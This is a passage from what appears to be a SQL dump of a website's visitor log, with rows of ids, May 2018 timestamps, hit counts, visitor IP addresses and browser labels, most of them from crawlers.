,0,'54.36.149.78','other'),(249171,1527065231,1,1,0,0,'54.36.148.27','other'),(249172,1527066112,1,1,0,0,'54.36.148.180','other'),(249173,1527066406,1,1,0,0,'8.29.198.26','other'),(249174,1527066424,1,1,0,0,'54.36.149.71','other'),(249175,1527066657,1,1,0,0,'91.196.178.134','firefox'),(249176,1527066850,1,1,0,0,'178.93.224.50','chrome'),(249177,1527066889,3,3,0,0,'91.196.178.162','chrome'),(249178,1527067043,1,1,0,0,'54.36.148.171','other'),(249179,1527067564,1,1,0,0,'82.207.49.46','firefox'),(249180,1527067635,1,1,0,0,'92.112.125.243','chrome'),(249181,1527067758,1,1,0,0,'66.102.9.40','chrome'),(249182,1527067761,3,3,0,0,'66.102.9.35','chrome'),(249183,1527067772,1,1,0,0,'54.36.148.48','other'),(249184,1527067843,1,1,0,0,'54.36.148.114','other'),(249185,1527067995,1,1,0,0,'141.8.142.74','other'),(249186,1527068084,2,2,0,0,'130.180.220.10','chrome'),(249187,1527068086,1,1,0,0,'144.217.66.151','other'),(249188,1527068115,1,1,0,0,'144.217.66.151','chrome'),(249189,1527068199,829,829,0,0,'185.6.8.9','other'),(249190,1527068288,1,1,0,0,'178.154.171.88','other'),(249191,1527068449,1,1,0,0,'54.36.148.171','other'),(249192,1527068479,1,1,0,0,'54.36.149.71','other'),(249193,1527068572,1,1,0,0,'54.36.148.112','other'),(249194,1527069916,1,1,0,0,'94.23.24.82','chrome'),(249195,1527069993,1,1,0,0,'54.36.149.11','other'),(249196,1527070117,1,1,0,0,'54.36.148.123','other'),(249197,1527070206,1,1,0,0,'141.8.142.74','other'),(249198,1527070276,1,1,0,0,'54.36.148.121','other'),(249199,1527070464,1,1,0,0,'54.36.148.68','other'),(249200,1527070599,1,1,0,0,'54.36.148.80','other'),(249201,1527070618,1,1,0,0,'54.36.149.23','other'),(249202,1527071275,1,1,0,0,'178.154.171.88','other'),(249203,1527071442,3,3,0,0,'141.8.142.74','other'),(249204,1527071786,1,1,0,0,'178.154.200.41','other'),(249205,1527071871,1,1,0,0,'8.29.198.26','other'),(249206,1527072095,1,1,0,0,'217.69.133.9','other'),(249207,1527072170,1,1,0,0,'54.36.149.18','other'),(249208,1527072198,1,1,0,0,'54.36.149.40','other'),(249209,1527072489,1,1,0,0,'54.36.148.125','other'),(249210,1527072543,1,1,0,0,'54.36.148.250','other'),(249211,1527072603,1,1,0,0,'141.8.142.74','other'),(249212,1527072676,1,1,0,0,'54.36.148.73','other'),(249213,1527072722,1,1,0,0,'216.244.66.237','other'),(249214,1527072833,1,1,0,0,'54.36.149.52','other'),(249215,1527073039,1,1,0,0,'91.124.85.183','chrome'),(249216,1527073201,1,1,0,0,'54.36.149.37','other'),(249217,1527073252,1,1,0,0,'62.221.40.186','chrome'),(249218,1527073355,1,1,0,0,'37.54.89.238','chrome'),(249219,1527073479,3,3,0,0,'46.70.40.139','firefox'),(249220,1527073767,1,1,0,0,'216.244.66.237','other'),(249221,1527075014,1,1,0,0,'37.55.142.38','firefox'),(249222,1527075335,1,1,0,0,'54.36.148.154','other'),(249223,1527075406,1,1,0,0,'91.227.206.30','firefox'),(249224,1527075486,1,1,0,0,'54.36.148.35','other'),(249225,1527075640,1,1,0,0,'54.36.148.11','other'),(249226,1527075712,1,1,0,0,'54.36.149.85','other'),(249227,1527076024,1,1,0,0,'54.36.148.43','other'),(249228,1527076180,1,1,0,0,'46.182.83.98','chrome'),(249229,1527077136,1,1,0,0,'188.163.17.21','firefox'),(249230,1527077168,1,1,0,0,'37.54.5.28','chrome'),(249231,1527077248,1,1,0,0,'8.29.198.25','other'),(249232,1527077580,1,1,0,0,'162.210.196.100','other'),(249233,1527077590,1,1,0,0,'54.36.148.19','other'),(249234,1527077664,1,1,0,0,'54.36.148.21','other'),(249235,1527077757,1,1,0,0,'54.36.148.69','other'),(249236,1527078060,1,1,0,0,'54.36.149.14','other'),(249237,1527078142,1,1,0,0,'54.36.148.240','other'),(249238,1527078456,1,1,0,0,'54.36.148.103','other'),(249239,1527078900,1,1,0,0,'31.43.254.15','chrome'),(249240,1527079188,1,1,0,0,'141.8.142.74','other'),(249241,1527079618,1,1,0,0,'54.36.148.146','other'),(249242,1527080168,1,1,0,0,'54.36.149.85','other'),(249243,1527080255,1,1,0,0,'54.36.148.182','other'),(249244,1527080413,1,1,0,0,'54.36.148.75','other'),(249245,1527080717,1,1,0,0,'54.36.148.41','other'),(249246,1527081177,1,1,0,0,'217.69.133.194','other'),(249247,1527081246,1,1,0,0,'54.36.149.38','other'),(249248,1527081375,1,1,0,0,'95.28.168.99','msie'),(249249,1527081418,1,1,0,0,'54.36.148.152','other'),(249250,1527081556,1,1,0,0,'54.36.148.39','other'),(249251,1527081585,2,2,0,0,'216.244.66.237','other'),(249252,1527081732,1,1,0,0,'95.132.34.115','firefox'),(249253,1527081860,1,1,0,0,'54.36.148.21','other'),(249254,1527081884,1,1,0,0,'217.69.133.203','other'),(249255,1527082147,1,1,0,0,'54.36.149.58','other'),(249256,1527082185,1,1,0,0,'54.36.148.130','other'),(249257,1527082530,2,2,0,0,'91.196.178.161','chrome'),(249258,1527082623,1,1,0,0,'163.172.4.153','chrome'),(249259,1527082705,1,1,0,0,'8.29.198.25','other'),(249260,1527083162,1,1,0,0,'54.36.148.248','other'),(249261,1527083209,1,1,0,0,'95.67.18.45','chrome'),(249262,1527083649,1,1,0,0,'54.36.148.197','other'),(249263,1527084190,1,1,0,0,'54.36.149.69','other'),(249264,1527084217,1,1,0,0,'54.36.148.87','other'),(249265,1527084379,1,1,0,0,'54.36.148.121','other'),(249266,1527084800,1,1,0,0,'188.230.43.254','other'),(249267,1527084904,1,1,0,0,'54.36.148.86','other'),(249268,1527085008,1,1,0,0,'54.36.148.217','other'),(249269,1527085010,1,1,0,0,'168.235.205.48','chrome'),(249270,1527085152,1,1,0,0,'54.36.148.122','other'),(249271,1527085318,1,1,0,0,'54.237.207.54','other'),(249272,1527085421,1,1,0,0,'77.37.161.253','msie'),(249273,1527085687,1,1,0,0,'54.36.148.243','other'),(249274,1527086102,1,1,0,0,'91.196.178.81','firefox'),(249275,1527086103,1,1,0,0,'216.244.66.237','other'),(249276,1527086222,1,1,0,0,'5.45.207.83','other'),(249277,1527087077,1,1,0,0,'54.36.148.92','other'),(249278,1527087256,1,1,0,0,'188.230.43.254','other'),(249279,1527087324,1,1,0,0,'54.36.148.131','other'),(249280,1527088089,1,1,0,0,'8.29.198.26','other'),(249281,1527088159,1,1,0,0,'54.36.148.161','other'),(249282,1527088301,1,1,0,0,'54.36.149.37','other'),(249283,1527088575,1,1,0,0,'54.36.148.196','other'),(249284,1527088777,1,1,0,0,'216.244.66.237','other'),(249285,1527089038,1,1,0,0,'54.36.148.55','other'),(249286,1527089484,1,1,0,0,'54.36.148.106','other'),(249287,1527089543,1,1,0,0,'54.36.148.235','other'),(249288,1527089603,1,1,0,0,'188.230.43.254','other'),(249289,1527089812,1,1,0,0,'54.36.149.13','other'),(249290,1527089901,1,1,0,0,'54.36.148.71','other'),(249291,1527090081,1,1,0,0,'54.36.148.191','other'),(249292,1527090127,1,1,0,0,'54.36.148.39','other'),(249293,1527090394,1,1,0,0,'5.165.183.51','msie'),(249294,1527090763,1,1,0,0,'54.36.148.154','other'),(249295,1527090995,1,1,0,0,'95.135.91.109','chrome'),(249296,1527091565,1,1,0,0,'54.36.149.26','other'),(249297,1527091997,1,1,0,0,'188.230.43.254','other'),(249298,1527092129,1,1,0,0,'77.41.90.111','firefox'),(249299,1527092163,1,1,0,0,'54.36.148.12','other'),(249300,1527092373,1,1,0,0,'54.36.148.121','other'),(249301,1527092782,1,1,0,0,'54.36.149.53','other'),(249302,1527092819,1,1,0,0,'37.110.129.87','msie'),(249303,1527093248,1,1,0,0,'54.36.149.45','other'),(249304,1527093385,1,1,0,0,'193.106.30.99','firefox'),(249305,1527093443,1,1,0,0,'54.36.148.230','other'),(249306,1527093531,1,1,0,0,'8.29.198.27','other'),(249307,1527093826,1,1,0,0,'54.36.148.155','other'),(249308,1527094398,1,1,0,0,'188.230.43.254','other'),(249309,1527095817,1,1,0,0,'54.36.148.233','other'),(249310,1527096039,1,1,0,0,'54.36.148.48','other'),(249311,1527096721,1,1,0,0,'54.36.148.56','other'),(249312,1527097411,1,1,0,0,'216.244.66.237','other'),(249313,1527097590,1,1,0,0,'54.165.59.7','other'),(249314,1527097828,1,1,0,0,'47.96.234.243','other'),(249315,1527098505,1,1,0,0,'37.53.224.203','chrome'),(249316,1527098918,1,1,0,0,'8.29.198.26','other'),(249317,1527098941,2,2,0,0,'91.196.178.167','chrome'),(249318,1527100459,1,1,0,0,'91.196.179.25','chrome'),(249319,1527100585,1,1,0,0,'54.36.149.42','other'),(249320,1527100605,1,1,0,0,'54.36.148.77','other'),(249321,1527100845,1,1,0,0,'40.77.167.27','other'),(249322,1527100848,1,1,0,0,'54.36.148.200','other'),(249323,1527101011,2,2,0,0,'178.92.74.8','chrome'),(249324,1527101534,1,1,0,0,'54.36.148.238','other'),(249325,1527101607,1,1,0,0,'54.36.148.56','other'),(249326,1527101692,1,1,0,0,'54.36.149.1','other'),(249327,1527101907,1,1,0,0,'54.36.148.129','other'),(249328,1527102639,1,1,0,0,'141.8.142.74','other'),(249329,1527103195,1,1,0,0,'54.36.149.65','other'),(249330,1527103404,2,2,0,0,'91.196.178.62','chrome'),(249331,1527103725,1,1,0,0,'54.36.148.122','other'),(249332,1527104378,1,1,0,0,'8.29.198.25','other'),(249333,1527104657,1,1,0,0,'54.36.149.105','other'),(249334,1527104921,1,1,0,0,'54.36.148.251','other'),(249335,1527105008,2,2,0,0,'91.196.178.3','chrome'),(249336,1527105052,1,1,0,0,'180.76.15.23','other'),(249337,1527105322,1,1,0,0,'54.36.148.174','other'),(249338,1527105520,1,1,0,0,'54.36.149.106','other'),(249339,1527105649,1,1,0,0,'91.196.178.165','firefox'),(249340,1527106147,1,1,0,0,'54.36.149.46','other'),(249341,1527106202,1,1,0,0,'54.36.148.47','other'),(249342,1527106817,1,1,0,0,'54.36.148.37','other'),(249343,1527106928,1,1,0,0,'54.36.149.27','other'),(249344,1527106957,1,1,0,0,'54.36.148.68','other'),(249345,1527107038,1,1,0,0,'54.36.149.21','other'),(249346,1527107073,1,1,0,0,'54.36.148.52','other'),(249347,1527107366,1,1,0,0,'54.36.149.0','other'),(249348,1527107556,1,1,0,0,'54.36.149.78','other'),(249349,1527107683,1,1,0,0,'141.8.142.74','other'),(249350,1527107818,1,0,1,0,'66.249.64.29',''),(249351,1527108398,1,1,0,0,'178.92.84.233','chrome'),(249352,1527108778,1,1,0,0,'54.36.148.36','other'),(249353,1527109027,1,0,1,0,'66.249.70.29',''),(249354,1527109337,1,1,0,0,'54.36.148.117','other'),(249355,1527109769,1,1,0,0,'54.36.148.50','other'),(249356,1527109772,1,1,0,0,'8.29.198.26','other'),(249357,1527109921,1,1,0,0,'54.36.148.213','other'),(249358,1527110099,1,1,0,0,'216.244.66.237','other'),(249359,1527110875,1,1,0,0,'217.69.133.6','other'),(249360,1527110938,1,1,0,0,'54.36.148.120','other'),(249361,1527111005,1,1,0,0,'54.36.148.144','other'),(249362,1527111349,1,1,0,0,'54.36.148.238','other'),(249363,1527111777,1,1,0,0,'54.36.148.146','other'),(249364,1527112189,1,1,0,0,'54.36.148.51','other'),(249365,1527112306,1,1,0,0,'141.8.142.74','other'),(249366,1527112338,1,1,0,0,'54.36.148.122','other'),(249367,1527112491,1,1,0,0,'216.244.66.237','other'),(249368,1527112664,1,1,0,0,'207.46.13.180','other'),(249369,1527113064,1,1,0,0,'180.76.15.29','other'),(249370,1527113244,1,1,0,0,'178.154.171.88','other'),(249371,1527113510,1,1,0,0,'54.36.148.127','other'),(249372,1527113978,1,1,0,0,'54.36.148.250','other'),(249373,1527114027,1,1,0,0,'141.8.142.74','other'),(249374,1527114042,1,1,0,0,'54.36.148.175','other'),(249375,1527114366,1,1,0,0,'54.36.149.56','other'),(249376,1527114661,1,1,0,0,'54.36.148.73','other'),(249377,1527114699,1,1,0,0,'91.196.178.74','chrome'),(249378,1527114704,1,1,0,0,'95.134.97.243','chrome'),(249379,1527115207,1,1,0,0,'8.29.198.26','other'),(249380,1527115233,1,1,0,0,'54.36.148.31','other'),(249381,1527115476,1,1,0,0,'80.248.227.208','other'),(249382,1527115853,1,1,0,0,'54.36.148.196','other'),(249383,1527116133,1,1,0,0,'54.36.149.61','other'),(249384,1527116639,1,1,0,0,'54.36.148.83','other'),(249385,1527117142,1,1,0,0,'217.69.133.9','other'),(249386,1527117406,1,1,0,0,'89.21.81.102','firefox'),(249387,1527117541,1,1,0,0,'180.76.15.161','other'),(249388,1527117569,1,1,0,0,'54.36.148.184','other'),(249389,1527117761,1,1,0,0,'54.36.149.96','other'),(249390,1527118032,1,1,0,0,'54.36.148.156','other'),(249391,1527118885,1,1,0,0,'66.249.70.25','chrome'),(249392,1527119074,1,1,0,0,'18.208.74.83','chrome'),(249393,1527119179,1,1,0,0,'178.154.171.88','other'),(249394,1527119273,1,1,0,0,'207.46.13.175','other'),(249395,1527119628,1,1,0,0,'54.36.148.150','other'),(249396,1527119673,1,1,0,0,'54.36.148.76','other'),(249397,1527119887,1,1,0,0,'37.9.113.115','other'),(249398,1527120458,1,1,0,0,'141.8.142.74','other'),(249399,1527120504,1,1,0,0,'54.36.148.84','other'),(249400,1527120615,1,1,0,0,'8.29.198.27','other'),(249401,1527120838,1,1,0,0,'207.46.13.132','other'),(249402,1527121292,1,1,0,0,'54.36.148.115','other'),(249403,1527121503,1,1,0,0,'178.154.171.88','other'),(249404,1527121913,1,1,0,0,'54.36.148.11','other'),(249405,1527122596,1,1,0,0,'54.36.149.36','other'),(249406,1527122630,1,1,0,0,'54.36.148.64','other'),(249407,1527122890,1,1,0,0,'54.36.148.159','other'),(249408,1527122964,1,1,0,0,'141.8.142.74','other'),(249409,1527123122,1,1,0,0,'54.36.149.77','other'),(249410,1527123345,1,1,0,0,'54.36.148.28','other'),(249411,1527124276,1,1,0,0,'54.36.148.52','other'),(249412,1527124523,1,1,0,0,'54.36.148.162','other'),(249413,1527124916,1,1,0,0,'178.154.171.88','other'),(249414,1527126034,1,1,0,0,'8.29.198.26','other'),(249415,1527126579,1,1,0,0,'54.36.148.217','other'),(249416,1527127197,1,1,0,0,'54.36.148.243','other'),(249417,1527127236,1,1,0,0,'54.36.148.150','other'),(249418,1527127687,1,1,0,0,'54.36.148.117','other'),(249419,1527127794,1,1,0,0,'54.36.149.83','other'),(249420,1527127969,1,1,0,0,'178.154.171.88','other'),(249421,1527128162,1,1,0,0,'54.36.148.227','other'),(249422,1527128193,1,1,0,0,'54.36.149.49','other'),(249423,1527128802,1,1,0,0,'144.76.220.40','other'),(249424,1527128941,1,1,0,0,'54.36.148.52','other'),(249425,1527129525,1,1,0,0,'54.36.149.17','other'),(249426,1527129587,1,1,0,0,'54.36.148.62','other'),(249427,1527129675,1,1,0,0,'54.36.149.13','other'),(249428,1527129804,1,1,0,0,'216.244.66.249','other'),(249429,1527129882,1,1,0,0,'46.30.165.52','chrome'),(249430,1527130178,1,1,0,0,'54.36.149.18','other'),(249431,1527130244,1,1,0,0,'54.36.148.229','other'),(249432,1527130511,2,2,0,0,'141.8.142.74','other'),(249433,1527130643,1,1,0,0,'54.36.148.78','other'),(249434,1527130717,1,1,0,0,'54.36.148.34','other'),(249435,1527130898,1,1,0,0,'207.46.13.216','other'),(249436,1527130904,1,1,0,0,'54.36.148.216','other'),(249437,1527130920,1,1,0,0,'54.36.148.65','other'),(249438,1527131083,1,1,0,0,'54.36.149.51','other'),(249439,1527131367,1,1,0,0,'54.36.148.211','other'),(249440,1527131459,1,1,0,0,'8.29.198.25','other'),(249441,1527131824,96,96,0,0,'95.216.5.150','other'),(249442,1527132476,1,1,0,0,'54.36.149.45','other'),(249443,1527133175,1,1,0,0,'54.36.149.52','other'),(249444,1527133309,1,1,0,0,'54.36.148.60','other'),(249445,1527133374,1,1,0,0,'37.9.113.115','other'),(249446,1527133482,1,1,0,0,'193.106.30.99','firefox'),(249447,1527134193,1,1,0,0,'54.36.148.124','other'),(249448,1527135276,1,1,0,0,'40.77.167.95','other'),(249449,1527135605,1,1,0,0,'54.36.148.203','other'),(249450,1527136020,1,1,0,0,'54.36.148.94','other'),(249451,1527136179,1,1,0,0,'54.36.149.63','other'),(249452,1527136443,1,1,0,0,'54.36.148.182','other'),(249453,1527136732,1,1,0,0,'141.8.142.74','other'),(249454,1527136864,1,1,0,0,'8.29.198.26','other'),(249455,1527137085,1,1,0,0,'54.36.148.222','other'),(249456,1527137494,1,1,0,0,'178.154.171.88','other'),(249457,1527138172,1,1,0,0,'176.105.198.215','chrome'),(249458,1527138518,1,1,0,0,'37.53.202.220','firefox'),(249459,1527138523,1,1,0,0,'54.36.148.16','other'),(249460,1527138720,3,3,0,0,'141.8.142.74','other'),(249461,1527138794,1,1,0,0,'54.36.148.135','other'),(249462,1527139701,1,1,0,0,'54.36.148.147','other'),(249463,1527139916,1,1,0,0,'54.36.148.126','other'),(249464,1527140077,1,1,0,0,'141.8.142.74','other'),(249465,1527140981,2,2,0,0,'91.196.177.46','chrome'),(249466,1527141446,7,7,0,0,'91.196.178.76','chrome'),(249467,1527141532,1,1,0,0,'178.92.74.193','chrome'),(249468,1527141589,1,1,0,0,'85.159.0.125','chrome'),(249469,1527141609,1,1,0,0,'54.36.148.46','other'),(249470,1527141658,2,2,0,0,'178.154.171.88','other'),(249471,1527141827,1,1,0,0,'54.36.148.57','other'),(249472,1527141884,1,1,0,0,'31.13.113.179','other'),(249473,1527141890,1,1,0,0,'31.13.115.21','other'),(249474,1527141897,1,1,0,0,'31.13.114.215','other'),(249475,1527141974,1,1,0,0,'54.36.148.33','other'),(249476,1527142007,1,1,0,0,'91.196.177.46','chrome'),(249477,1527142036,1,1,0,0,'66.249.70.29','chrome'),(249478,1527142282,1,1,0,0,'37.73.17.210','other'),(249479,1527142297,1,1,0,0,'8.29.198.26','other'),(249480,1527142356,1,1,0,0,'54.36.149.63','other'),(249481,1527142450,1,1,0,0,'54.36.149.75','other'),(249482,1527142452,1,1,0,0,'46.211.111.161','other'),(249483,1527142473,1,1,0,0,'91.196.178.76','chrome'),(249484,1527142700,1,1,0,0,'54.36.148.48','other'),(249485,1527142856,1,1,0,0,'54.36.148.111','other'),(249486,1527142902,1,1,0,0,'95.132.23.84','firefox'),(249487,1527142910,1,1,0,0,'178.154.171.88','other'),(249488,1527143121,1,1,0,0,'207.46.13.101','other'),(249489,1527143277,2,2,0,0,'91.196.178.169','chrome'),(249490,1527143402,1,1,0,0,'92.112.22.125','chrome'),(249491,1527143861,1,1,0,0,'141.8.142.74','other'),(249492,1527144173,1,1,0,0,'54.36.148.155','other'),(249493,1527144209,1,1,0,0,'46.133.181.102','chrome'),(249494,1527144306,1,1,0,0,'37.54.16.17','chrome'),(249495,1527144527,1,1,0,0,'54.36.149.20','other'),(249496,1527144653,7,7,0,0,'37.53.89.22','chrome'),(249497,1527145321,1,1,0,0,'178.154.171.88','other'),(249498,1527145331,1,1,0,0,'141.8.142.74','other'),(249499,1527145491,1,1,0,0,'91.200.124.43','chrome'),(249500,1527145494,1,1,0,0,'91.200.124.41','chrome'),(249501,1527145640,1,1,0,0,'91.196.178.77','firefox'),(249502,1527145838,2,2,0,0,'91.196.178.163','chrome'),(249503,1527145844,1,1,0,0,'54.36.148.192','other'),(249504,1527145868,1,1,0,0,'54.36.149.19','other'),(249505,1527146164,1,1,0,0,'54.36.149.105','other'),(249506,1527146381,1,1,0,0,'54.36.148.194','other'),(249507,1527146463,1,1,0,0,'54.36.148.162','other'),(249508,1527146755,1,1,0,0,'54.36.149.6','other'),(249509,1527146814,1,1,0,0,'178.92.250.247','firefox'),(249510,1527146964,1,1,0,0,'141.8.142.74','other'),(249511,1527146973,1,1,0,0,'217.69.133.194','other'),(249512,1527147121,1,1,0,0,'207.46.13.132','other'),(249513,1527147129,1,1,0,0,'216.244.66.249','other'),(249514,1527147325,1,0,1,0,'66.249.64.28',''),(249515,1527147460,1,1,0,0,'54.36.148.183','other'),(249516,1527147695,1,1,0,0,'8.29.198.25','other'),(249517,1527147975,1,1,0,0,'141.8.142.74','other'),(249518,1527148040,2,2,0,0,'195.230.119.59','chrome'),(249519,1527149429,2,2,0,0,'185.154.23.122','chrome'),(249520,1527149445,1,1,0,0,'91.196.178.134','firefox'),(249521,1527149558,1,1,0,0,'54.36.149.65','other'),(249522,1527149644,1,1,0,0,'54.36.148.12','other'),(249523,1527149754,1,1,0,0,'95.132.23.84','firefox'),(249524,1527149783,1,1,0,0,'54.36.148.34','other'),(249525,1527149849,1,1,0,0,'5.58.28.67','other'),(249526,1527149924,1,1,0,0,'54.36.148.81','other'),(249527,1527150092,1,1,0,0,'173.212.233.72','other'),(249528,1527150093,1,1,0,0,'173.212.233.72','msie'),(249529,1527150162,1,1,0,0,'37.55.224.196','chrome'),(249530,1527150638,1,1,0,0,'54.36.149.99','other'),(249531,1527150720,1,1,0,0,'54.36.149.21','other'),(249532,1527150851,2,2,0,0,'95.216.11.240','other'),(249533,1527151042,1,1,0,0,'141.8.142.74','other'),(249534,1527151116,1,1,0,0,'54.36.148.25','other'),(249535,1527151158,1,1,0,0,'54.36.148.27','other'),(249536,1527151340,3,3,0,0,'195.154.243.51','other'),(249537,1527151518,1,1,0,0,'54.36.148.30','other'),(249538,1527151520,2,2,0,0,'91.196.178.68','chrome'),(249539,1527151689,2,2,0,0,'91.196.178.92','chrome'),(249540,1527151927,1,1,0,0,'54.36.149.43','other'),(249541,1527152311,1,1,0,0,'54.36.148.42','other'),(249542,1527152314,1,1,0,0,'54.36.148.189','other'),(249543,1527152382,1,1,0,0,'54.36.149.54','other'),(249544,1527152440,1,1,0,0,'54.36.148.155','other'),(249545,1527152442,1,1,0,0,'54.36.149.23','other'),(249546,1527152639,1,1,0,0,'54.36.148.106','other'),(249547,1527152882,1,1,0,0,'54.36.148.53','other'),(249548,1527153085,1,1,0,0,'54.36.148.209','other'),(249549,1527153146,1,1,0,0,'8.29.198.26','other'),(249550,1527153168,1,1,0,0,'54.36.148.33','other'),(249551,1527153278,1,1,0,0,'109.162.122.189','firefox'),(249552,1527153336,1,1,0,0,'54.36.149.13','other'),(249553,1527153722,1,1,0,0,'54.36.148.153','other'),(249554,1527154038,1,1,0,0,'91.196.178.30','chrome'),(249555,1527154133,1,1,0,0,'141.8.142.74','other'),(249556,1527154308,1,1,0,0,'54.36.148.241','other'),(249557,1527154388,1,1,0,0,'91.209.11.236','other'),(249558,1527154497,1,1,0,0,'54.36.149.29','other'),(249559,1527154558,1,1,0,0,'54.36.148.218','other'),(249560,1527154584,1,1,0,0,'91.196.178.133','firefox'),(249561,1527154807,2,2,0,0,'91.196.178.68','chrome'),(249562,1527154933,1,1,0,0,'54.36.148.149','other'),(249563,1527155058,1,1,0,0,'54.36.148.17','other'),(249564,1527155519,1,1,0,0,'91.196.178.30','chrome'),(249565,1527155674,2,2,0,0,'91.196.178.161','chrome'),(249566,1527155732,1,1,0,0,'91.196.177.134','chrome'),(249567,1527156084,1,1,0,0,'212.26.138.26','chrome'),(249568,1527156273,1,1,0,0,'54.36.149.98','other'),(249569,1527156358,2,2,0,0,'46.133.21.168','chrome'),(249570,1527156399,1,1,0,0,'37.187.7.74','firefox'),(249571,1527156470,2,2,0,0,'69.12.66.252','chrome'),(249572,1527156473,41,41,0,0,'69.12.66.252','other'),(249573,1527156764,3,3,0,0,'91.196.178.28','chrome'),(249574,1527156951,1,1,0,0,'193.106.30.99','firefox'),(249575,1527157230,1,1,0,0,'157.55.39.85','other'),(249576,1527157340,2,2,0,0,'91.196.177.46','chrome'),(249577,1527157472,1,1,0,0,'54.36.149.48','other'),(249578,1527157569,1,1,0,0,'173.252.88.14','other'),(249579,1527157680,1,1,0,0,'141.8.142.74','other'),(249580,1527157846,1,1,0,0,'207.46.13.157','other'),(249581,1527158321,1,1,0,0,'157.55.39.85','other'),(249582,1527158537,1,1,0,0,'8.29.198.27','other'),(249583,1527158912,1,1,0,0,'216.244.66.249','other'),(249584,1527159051,1,1,0,0,'54.36.149.101','other'),(249585,1527159053,1,1,0,0,'54.36.148.109','other'),(249586,1527159288,1,1,0,0,'54.36.148.43','other'),(249587,1527159556,1,1,0,0,'54.36.149.73','other'),(249588,1527159680,1,1,0,0,'54.36.148.213','other'),(249589,1527159724,1,1,0,0,'54.36.148.162','other'),(249590,1527160036,1,1,0,0,'91.209.11.236','other'),(249591,1527160049,1,1,0,0,'54.36.148.203','other'),(249592,1527160450,1,1,0,0,'54.36.148.99','other'),(249593,1527160978,1,1,0,0,'91.196.178.30','chrome'),(249594,1527161110,1,1,0,0,'54.36.148.61','other'),(249595,1527161470,1,1,0,0,'54.36.148.155','other'),(249596,1527161618,1,1,0,0,'54.36.149.97','other'),(249597,1527161904,1,1,0,0,'54.36.148.41','other'),(249598,1527162034,1,1,0,0,'54.36.148.241','other'),(249599,1527162100,1,0,1,0,'66.249.64.29',''),(249600,1527162200,1,1,0,0,'54.36.148.125','other'),(249601,1527162273,1,1,0,0,'87.250.224.46','other'),(249602,1527162334,1,1,0,0,'54.36.148.17','other'),(249603,1527162828,1,1,0,0,'54.36.148.196','other'),(249604,1527162923,1,1,0,0,'54.36.148.255','other'),(249605,1527163201,1,1,0,0,'54.36.148.59','other'),(249606,1527163315,1,1,0,0,'69.171.225.49','other'),(249607,1527163377,1,1,0,0,'46.133.220.79','chrome'),(249608,1527163771,1,1,0,0,'92.112.125.243','chrome'),(249609,1527163842,1,1,0,0,'217.69.133.2','other'),(249610,1527163854,1,1,0,0,'54.36.148.196','other'),(249611,1527164010,1,1,0,0,'8.29.198.26','other'),(249612,1527164188,1,1,0,0,'54.36.148.128','other'),(249613,1527164200,1,1,0,0,'91.124.182.170','firefox'),(249614,1527164353,1,1,0,0,'87.250.224.46','other'),(249615,1527164635,1,1,0,0,'207.46.13.168','other'),(249616,1527164757,1,1,0,0,'178.154.171.88','other'),(249617,1527165012,1,1,0,0,'54.36.148.143','other'),(249618,1527165314,1,1,0,0,'91.196.178.72','firefox'),(249619,1527165343,1,1,0,0,'54.36.148.59','other'),(249620,1527165619,1,1,0,0,'95.132.33.184','firefox'),(249621,1527165753,1,1,0,0,'54.36.148.35','other'),(249622,1527165887,1,1,0,0,'207.46.13.168','other'),(249623,1527165950,2,2,0,0,'91.196.178.89','chrome'),(249624,1527165994,1,1,0,0,'141.8.142.74','other'),(249625,1527166210,1,1,0,0,'54.36.148.179','other'),(249626,1527166459,1,1,0,0,'66.249.93.202','chrome'),(249627,1527166575,1,1,0,0,'92.112.125.243','chrome'),(249628,1527166592,1,1,0,0,'54.36.149.15','other'),(249629,1527166926,1,1,0,0,'54.36.148.46','other'),(249630,1527167017,1,1,0,0,'91.196.178.77','firefox'),(249631,1527167063,2,2,0,0,'216.244.66.249','other'),(249632,1527167251,1,1,0,0,'54.36.148.184','other'),(249633,1527167572,1,1,0,0,'54.36.148.234','other'),(249634,1527167726,2,2,0,0,'91.196.178.162','chrome'),(249635,1527167727,1,1,0,0,'54.36.148.151','other'),(249636,1527168533,1,1,0,0,'62.205.134.182','msie'),(249637,1527168574,1,1,0,0,'217.69.133.9','other'),(249638,1527168729,1,1,0,0,'95.163.255.8','other'),(249639,1527168869,1,1,0,0,'54.36.148.109','other'),(249640,1527168968,1,1,0,0,'54.36.148.136','other'),(249641,1527169061,1,1,0,0,'54.36.149.19','other'),(249642,1527169127,1,1,0,0,'54.36.148.215','other'),(249643,1527169369,1,1,0,0,'8.29.198.25','other'),(249644,1527169455,2,2,0,0,'91.196.178.92','chrome'),(249645,1527169512,1,1,0,0,'162.210.196.98','other'),(249646,1527169815,1,1,0,0,'54.36.148.83','other'),(249647,1527169837,1,1,0,0,'40.77.167.123','other'),(249648,1527169881,1,1,0,0,'188.230.43.254','other'),(249649,1527170462,2,2,0,0,'141.8.142.74','other'),(249650,1527170478,1,1,0,0,'46.188.90.33','msie'),(249651,1527170479,1,1,0,0,'77.37.227.104','msie'),(249652,1527170894,2,2,0,0,'80.254.155.43','chrome'),(249653,1527171287,1,1,0,0,'62.205.134.182','msie'),(249654,1527171432,1,1,0,0,'54.36.148.159','other'),(249655,1527171468,2,2,0,0,'141.8.142.74','other'),(249656,1527171760,1,1,0,0,'54.36.149.48','other'),(249657,1527171890,1,1,0,0,'54.36.148.186','other'),(249658,1527171999,1,1,0,0,'54.36.148.181','other'),(249659,1527172075,1,1,0,0,'54.36.148.73','other'),(249660,1527172127,1,1,0,0,'54.36.148.124','other'),(249661,1527172230,1,1,0,0,'54.36.148.202','other'),(249662,1527172305,1,1,0,0,'188.230.43.254','other'),(249663,1527172497,1,1,0,0,'37.187.148.221','firefox'),(249664,1527172796,1,1,0,0,'54.36.149.88','other'),(249665,1527173302,1,1,0,0,'46.133.227.143','chrome'),(249666,1527174226,1,1,0,0,'217.69.133.203','other'),(249667,1527174677,1,1,0,0,'54.36.149.41','other'),(249668,1527174684,1,1,0,0,'188.230.43.254','other'),(249669,1527174777,1,1,0,0,'54.36.149.45','other'),(249670,1527174860,1,1,0,0,'8.29.198.27','other'),(249671,1527175141,1,1,0,0,'46.4.121.23','other'),(249672,1527175251,1,1,0,0,'54.36.149.87','other'),(249673,1527175304,1,1,0,0,'54.36.149.83','other'),(249674,1527175305,1,1,0,0,'188.230.43.254','chrome'),(249675,1527175426,1,1,0,0,'54.36.149.34','other'),(249676,1527175549,1,1,0,0,'54.36.148.125','other'),(249677,1527175600,1,1,0,0,'54.36.149.44','other'),(249678,1527175677,1,1,0,0,'178.154.200.7','other'),(249679,1527175971,1,1,0,0,'54.36.149.64','other'),(249680,1527176166,1,1,0,0,